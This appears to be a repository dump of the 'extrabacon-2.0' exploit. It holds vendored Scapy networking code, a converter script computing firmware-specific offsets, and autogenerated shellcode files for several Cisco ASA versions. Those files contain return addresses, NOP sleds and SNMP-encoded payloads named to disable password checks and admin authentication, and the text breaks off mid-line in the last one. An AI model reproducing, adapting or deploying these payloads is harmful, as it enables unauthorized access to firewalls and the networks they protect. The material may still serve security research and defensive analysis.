verbose=conf.verb 121 | # Transform "192.168.*.1-5" to one IP of the set 122 | dst = dest.split("/")[0] 123 | dst = dst.replace("*","0") 124 | while 1: 125 | l = dst.find("-") 126 | if l < 0: 127 | break 128 | m = (dst[l:]+".").find(".") 129 | dst = dst[:l]+dst[l+m:] 130 | 131 | 132 | dst = atol(dst) 133 | pathes=[] 134 | for d,m,gw,i,a in self.routes: 135 | aa = atol(a) 136 | if aa == dst: 137 | pathes.append((0xffffffffL,(LOOPBACK_NAME,a,"0.0.0.0"))) 138 | if (dst & m) == (d & m): 139 | pathes.append((m,(i,a,gw))) 140 | if not pathes: 141 | if verbose: 142 | warning("No route found (no default route?)") 143 | return LOOPBACK_NAME,"0.0.0.0","0.0.0.0" #XXX linux specific! 144 | # Choose the more specific route (greatest netmask). 145 | # XXX: we don't care about metrics 146 | pathes.sort() 147 | ret = pathes[-1][1] 148 | self.cache[dest] = ret 149 | return ret 150 | 151 | def get_if_bcast(self, iff): 152 | for net, msk, gw, iface, addr in self.routes: 153 | if (iff == iface and net != 0L): 154 | bcast = atol(addr)|(~msk&0xffffffffL); # FIXME: check error in atol() 155 | return ltoa(bcast); 156 | warning("No broadcast address found for iface %s\n" % iff); 157 | 158 | conf.route=Route() 159 | 160 | #XXX use "with" 161 | _betteriface = conf.route.route("0.0.0.0", verbose=0)[0] 162 | if _betteriface != LOOPBACK_NAME: 163 | conf.iface = _betteriface 164 | del(_betteriface) 165 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/supersocket.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | import socket,time 7 | from config import conf 8 | from data import * 9 | 10 | class _SuperSocket_metaclass(type): 11 | def __repr__(self): 12 | if self.desc is not None: 13 | return "<%s: %s>" % 
(self.__name__,self.desc) 14 | else: 15 | return "<%s>" % self.__name__ 16 | 17 | 18 | class SuperSocket: 19 | __metaclass__ = _SuperSocket_metaclass 20 | desc = None 21 | closed=0 22 | def __init__(self, family=socket.AF_INET,type=socket.SOCK_STREAM, proto=0): 23 | self.ins = socket.socket(family, type, proto) 24 | self.outs = self.ins 25 | self.promisc=None 26 | def send(self, x): 27 | sx = str(x) 28 | x.sent_time = time.time() 29 | return self.outs.send(sx) 30 | def recv(self, x=MTU): 31 | return conf.raw_layer(self.ins.recv(x)) 32 | def fileno(self): 33 | return self.ins.fileno() 34 | def close(self): 35 | if self.closed: 36 | return 37 | self.closed=1 38 | if self.ins != self.outs: 39 | if self.outs and self.outs.fileno() != -1: 40 | self.outs.close() 41 | if self.ins and self.ins.fileno() != -1: 42 | self.ins.close() 43 | def sr(self, *args, **kargs): 44 | return sendrecv.sndrcv(self, *args, **kargs) 45 | def sr1(self, *args, **kargs): 46 | a,b = sendrecv.sndrcv(self, *args, **kargs) 47 | if len(a) > 0: 48 | return a[0][1] 49 | else: 50 | return None 51 | def sniff(self, *args, **kargs): 52 | return sendrecv.sniff(opened_socket=self, *args, **kargs) 53 | 54 | class L3RawSocket(SuperSocket): 55 | desc = "Layer 3 using Raw sockets (PF_INET/SOCK_RAW)" 56 | def __init__(self, type = ETH_P_IP, filter=None, iface=None, promisc=None, nofilter=0): 57 | self.outs = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) 58 | self.outs.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1) 59 | self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) 60 | def recv(self, x=MTU): 61 | return Ether(self.ins.recv(x)).payload 62 | def send(self, x): 63 | try: 64 | sx = str(x) 65 | x.sent_time = time.time() 66 | self.outs.sendto(sx,(x.dst,0)) 67 | except socket.error,msg: 68 | log_runtime.error(msg) 69 | 70 | class SimpleSocket(SuperSocket): 71 | desc = "wrapper arround a classic socket" 72 | def __init__(self, sock): 73 | self.ins = sock 74 | 
self.outs = sock 75 | 76 | 77 | class StreamSocket(SimpleSocket): 78 | desc = "transforms a stream socket into a layer 2" 79 | def __init__(self, sock, basecls=None): 80 | if basecls is None: 81 | basecls = conf.raw_layer 82 | SimpleSocket.__init__(self, sock) 83 | self.basecls = basecls 84 | 85 | def recv(self, x=MTU): 86 | pkt = self.ins.recv(x, socket.MSG_PEEK) 87 | x = len(pkt) 88 | if x == 0: 89 | raise socket.error((100,"Underlying stream socket tore down")) 90 | pkt = self.basecls(pkt) 91 | pad = pkt[Padding] 92 | if pad is not None and pad.underlayer is not None: 93 | del(pad.underlayer.payload) 94 | while pad is not None and not isinstance(pad, NoPayload): 95 | x -= len(pad.load) 96 | pad = pad.payload 97 | self.ins.recv(x) 98 | return pkt 99 | 100 | 101 | 102 | if conf.L3socket is None: 103 | conf.L3socket = L3RawSocket 104 | 105 | import sendrecv 106 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/tools/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/tools/check_asdis.py: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/env python 2 | 3 | import getopt 4 | 5 | def usage(): 6 | print >>sys.stderr,"""Usage: check_asdis -i [-o ] 7 | -v increase verbosity 8 | -d hexdiff packets that differ 9 | -z compress output pcap 10 | -a open pcap file in append mode""" 11 | 12 | def main(argv): 13 | PCAP_IN = None 14 | PCAP_OUT = None 15 | COMPRESS=False 16 | APPEND=False 17 | DIFF=False 18 | VERBOSE=0 19 | try: 20 | opts=getopt.getopt(argv, "hi:o:azdv") 21 | for opt, parm in opts[0]: 22 | if opt == "-h": 23 | usage() 24 | raise SystemExit 25 | elif opt == "-i": 26 | PCAP_IN = parm 27 | elif opt == "-o": 28 | PCAP_OUT = parm 29 | elif opt == "-v": 30 | VERBOSE += 1 31 | elif opt == "-d": 32 | DIFF = True 33 | elif opt == "-a": 34 | APPEND = True 35 | elif opt == "-z": 36 | COMPRESS = True 37 | 38 | 39 | if PCAP_IN is None: 40 | raise getopt.GetoptError("Missing pcap file (-i)") 41 | 42 | except getopt.GetoptError,e: 43 | print >>sys.stderr,"ERROR: %s" % e 44 | raise SystemExit 45 | 46 | 47 | 48 | from scapy.config import conf 49 | from scapy.utils import RawPcapReader,RawPcapWriter,hexdiff 50 | from scapy.layers import all 51 | 52 | 53 | pcap = RawPcapReader(PCAP_IN) 54 | pcap_out = None 55 | if PCAP_OUT: 56 | pcap_out = RawPcapWriter(PCAP_OUT, append=APPEND, gz=COMPRESS, linktype=pcap.linktype) 57 | pcap_out._write_header(None) 58 | 59 | LLcls = conf.l2types.get(pcap.linktype) 60 | if LLcls is None: 61 | print >>sys.stderr," Unknown link type [%i]. Can't test anything!" 
% pcap.linktype 62 | raise SystemExit 63 | 64 | 65 | i=-1 66 | differ=0 67 | failed=0 68 | for p1,meta in pcap: 69 | i += 1 70 | try: 71 | p2d = LLcls(p1) 72 | p2 = str(p2d) 73 | except KeyboardInterrupt: 74 | raise 75 | except Exception,e: 76 | print "Dissection error on packet %i" % i 77 | failed += 1 78 | else: 79 | if p1 == p2: 80 | if VERBOSE >= 2: 81 | print "Packet %i ok" % i 82 | continue 83 | else: 84 | print "Packet %i differs" % i 85 | differ += 1 86 | if VERBOSE >= 1: 87 | print repr(p2d) 88 | if DIFF: 89 | hexdiff(p1,p2) 90 | if pcap_out is not None: 91 | pcap_out.write(p1) 92 | i+=1 93 | correct = i-differ-failed 94 | print "%i total packets. %i ok, %i differed, %i failed. %.2f%% correct." % (i, correct, differ, 95 | failed, i and 100.0*(correct)/i) 96 | 97 | 98 | if __name__ == "__main__": 99 | import sys 100 | try: 101 | main(sys.argv[1:]) 102 | except KeyboardInterrupt: 103 | print >>sys.stderr,"Interrupted by user." 104 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/converter.py: -------------------------------------------------------------------------------- 1 | from shellcode_asa803_6 import * 2 | #sc = __import__("shellcode_asa803-6") 3 | import binascii 4 | 5 | def xor_a5(bytes): 6 | ret = binascii.hexlify(bytes) 7 | ret = int(ret, 16) 8 | ret ^= 0xa5a5a5a5 9 | return ret 10 | 11 | def hex_to_snmp(hex, convert_endian = True): 12 | #if (len(hex_str) == 7): 13 | # hex_str = "0" + hex_str 14 | #print hex_str 15 | hex_str = "%08x" % hex 16 | octets = [hex_str[j:j+2] for j in range(0,len(hex_str),2)] 17 | octets = ".".join(reversed([str(int(i,16)) for i in octets])) 18 | return octets 19 | 20 | #safe_ret_snmp = ".".join(preamble_snmp.split(".")[1:5]) 21 | safe_ret_hex = preamble_byte[1:5] 22 | safe_ret_hex = safe_ret_hex[::-1] 23 | safe_ret_hex = xor_a5(safe_ret_hex) 24 | safe_ret_snmp = hex_to_snmp(safe_ret_hex) 25 | 26 | stack_clean_snmp = (preamble_snmp.split(".")[0x14]) 27 | 
stack_clean_hex = int(binascii.hexlify(preamble_byte[0x14]), 16) 28 | 29 | #pm_bounds_snmp = ".".join(payload_PMCHECK_DISABLE_snmp.split(".")[0xd:0x11]) 30 | pm_bounds_hex = payload_PMCHECK_DISABLE_byte[0xd:0x11][::-1] 31 | pm_bounds_hex = xor_a5(pm_bounds_hex) 32 | pm_bounds_snmp = hex_to_snmp(pm_bounds_hex) 33 | 34 | pm_addr_snmp = ".".join(payload_PMCHECK_DISABLE_snmp.split(".")[0x26:0x2a]) 35 | pm_addr_hex = payload_PMCHECK_DISABLE_byte[0x26:0x2a] 36 | pm_addr_hex = int(binascii.hexlify(pm_addr_hex[::-1]), 16) 37 | 38 | #aa_bounds_snmp = ".".join(payload_AAAADMINAUTH_DISABLE_snmp.split(".")[0xd:0x11]) 39 | aa_bounds_hex = payload_AAAADMINAUTH_DISABLE_byte[0xd:0x11] 40 | aa_bounds_hex = aa_bounds_hex[::-1] 41 | aa_bounds_hex = xor_a5(aa_bounds_hex) 42 | aa_bounds_snmp = hex_to_snmp(aa_bounds_hex) 43 | 44 | aa_addr_snmp = ".".join(payload_AAAADMINAUTH_DISABLE_snmp.split(".")[0x26:0x2a]) 45 | aa_addr_hex = payload_AAAADMINAUTH_DISABLE_byte[0x26:0x2a] 46 | aa_addr_hex = int(binascii.hexlify(aa_addr_hex[::-1]), 16) 47 | 48 | jmp_esp_snmp = my_ret_addr_snmp 49 | jmp_esp_hex = binascii.hexlify(my_ret_addr_byte[::-1]) 50 | jmp_esp_hex = int(jmp_esp_hex, 16) 51 | 52 | pm_code_snmp = ".".join(payload_PMCHECK_ENABLE_snmp.split(".")[0x1b:0x1f]) 53 | pm_code_hex = 0 54 | 55 | aa_code_snmp = ".".join(payload_AAAADMINAUTH_ENABLE_snmp.split(".")[0x1b:0x1f]) 56 | aa_code_hex = 0 57 | 58 | ''' 59 | saferet_offset = "134.177.3.9" # 0x0903b186 60 | jmp_esp_offset = "173.250.27.8" # 0x081bfaad 61 | admauth_offset = "96.49.8.8" # 0x08083160 62 | admauth_bounds = "0.48.8.8" # 0x08083000 63 | admauth_code = "85.137.229.87" # 0x5589e557 64 | pmcheck_offset = "176.119.127.9" # 0x097f77b0 65 | pmcheck_bounds = "0.112.127.9" # 0x097f7000 66 | pmcheck_code = "85.49.192.137" # 0x5531c089 67 | fix_ebp = "72" # 0x48 68 | #"VERS" => ["173.250.27.8", "134.177.3.9", "72", "0.112.127.9", "176.119.127.9", "85.49.192.137", "0.48.8.8", "96.49.8.8", "85.137.229.87"] 69 | ''' 70 | ''' 71 | "9.2(3)" => 
["29.112.29.8", # jmp_esp_offset, 0 72 | "134.115.39.9", # saferet_offset, 1 73 | "72", # fix_ebp, 2 74 | "0.128.183.9", # pmcheck_bounds, 3 75 | "16.128.183.9", # pmcheck_offset, 4 76 | "85.49.192.137", # pmcheck_code, 5 77 | "0.80.8.8", # admauth_bounds, 6 78 | "64.90.8.8", # admauth_offset, 7 79 | "85.137.229.87"], # admauth_code, 8 80 | ''' 81 | 82 | print('saferet_offset = "%s" # 0x%08x' % (safe_ret_snmp, safe_ret_hex)) 83 | print('jmp_esp_offset = "%s" # 0x%08x' % (jmp_esp_snmp, jmp_esp_hex)) 84 | print('admauth_offset = "%s" # 0x%08x' % (aa_addr_snmp, aa_addr_hex)) 85 | print('admauth_bounds = "%s" # 0x%08x' % (aa_bounds_snmp, aa_bounds_hex)) 86 | print('admauth_code = "%s" # 0x%08x' % (aa_code_snmp, aa_code_hex)) 87 | print('pmcheck_bounds = "%s" # 0x%08x' % (pm_bounds_snmp, pm_bounds_hex)) 88 | print('pmcheck_offset = "%s" # 0x%08x' % (pm_addr_snmp, pm_addr_hex)) 89 | print('pmcheck_code = "%s" # 0x%08x' % (pm_code_snmp, pm_code_hex)) 90 | print('fix_ebp = "%s" # 0x%02x' % (stack_clean_snmp, stack_clean_hex)) 91 | 92 | stuff = (jmp_esp_snmp, safe_ret_snmp, stack_clean_snmp, pm_bounds_snmp, pm_addr_snmp, pm_code_snmp, aa_bounds_snmp, aa_addr_snmp, aa_code_snmp) 93 | 94 | print('#"VERS" => ["%s", "%s", "%s", "%s", "%s", "%s", "%s", "%s", "%s"]' % stuff) 95 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa802.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa802" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x9b\xde\xd3\x08" 11 | 12 | my_ret_addr_snmp = "155.222.211.8" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = 
"\xb8\x89\xc2\x3a\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.137.194.58.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x4d\x7c\x12\x09\x50\xb8\xe5\xac\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.77.124.18.9.80.184.229.172.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xc8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.200.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x4d\x7c\x12\x09\x50\xb8\xe5\xac\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.77.124.18.9.80.184.229.172.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = 
"\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x45\xa3\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x20\xed\x06\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.69.163.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.32.237.6.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\x20\xed\x06\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x45\xa3\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.32.237.6.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.69.163.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xf5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x30\x5a\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.245.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.48.90.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = 
"\xeb\x14\xbf\x30\x5a\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xf5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.48.90.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.245.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa803.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa803" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x8d\x7b\x83\x09" 11 | 12 | my_ret_addr_snmp = "141.123.131.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x39\x2f\x05\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.57.47.5.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\xfd\xbb\x53\x09\x50\xb8\x55\xa9\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.253.187.83.9.80.184.85.169.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xc8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | 
launcher_snmp = "139.132.36.200.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xfd\xbb\x53\x09\x50\xb8\x55\xa9\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.253.187.83.9.80.184.85.169.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x25\xac\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x70\x82\x09\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.37.172.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.112.130.9.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = 
"\xeb\x14\xbf\x70\x82\x09\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x25\xac\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.112.130.9.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.37.172.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xb0\x60\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.176.96.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\xb0\x60\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.176.96.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa803_6.py: 
-------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa803-6" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\xbf\x8f\x18\x09" 11 | 12 | my_ret_addr_snmp = "191.143.24.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\xb9\x3b\x04\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.185.59.4.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\xfd\x95\x56\x09\x50\xb8\xa5\xb4\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.253.149.86.9.80.184.165.180.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xc8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.200.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xfd\x95\x56\x09\x50\xb8\xa5\xb4\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = 
